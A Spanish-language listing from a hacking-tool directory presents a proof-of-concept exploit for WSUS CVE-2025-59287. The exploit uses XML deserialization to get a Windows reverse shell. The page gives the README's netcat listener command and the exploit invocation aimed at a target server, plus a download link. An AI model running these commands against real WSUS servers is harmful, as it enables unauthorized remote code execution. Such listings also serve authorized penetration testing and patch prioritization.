Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287 — PoC exploit para WSUS CVE-2025-59287 que utiliza deserialización XML para lograr una reverse shell de Windows a través de SOAP y ObjectDataProvider. | Kitploit
Herramientas/GitHubGitHub/furkankayapinar/cve-2025-59287
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubfurkankayapinar/cve-2025-59287

CVE-2025-59287

PoC exploit para WSUS CVE-2025-59287 que utiliza deserialización XML para lograr una reverse shell de Windows a través de SOAP y ObjectDataProvider.

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59287

WSUS CVE-2025-59287 – Deserialización XML RCE (Reverse Shell) Un PoC enfocado para explotar WSUS CVE-2025-59287 mediante deserialización XML para lograr una reverse shell de Windows. Este script solo admite un payload de reverse shell (sin fallback de calc). Objetivo: Windows Server con rol WSUS Técnica: SOAP + deserialización ObjectDataProvider Resultado: cmd.exe lanza una reverse shell de PowerShell hacia tu listener Aviso legal Solo para pruebas autorizadas en entornos de laboratorio. Eres responsable de cumplir con todas las leyes aplicables. Requisitos Python 3.x Acceso de red a los endpoints de WSUS (normalmente 8530/8531) Listener en tu máquina (p. ej., nc)

Iniciar listener

nc -lvnp 4444

Ejecutar exploit

python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug

-u: URL base de WSUS (http/https, normalmente puerto 8530/8531) -l: Tu IP para recibir la shell -p: Puerto de tu listener --debug: Salida detallada

Descargar herramienta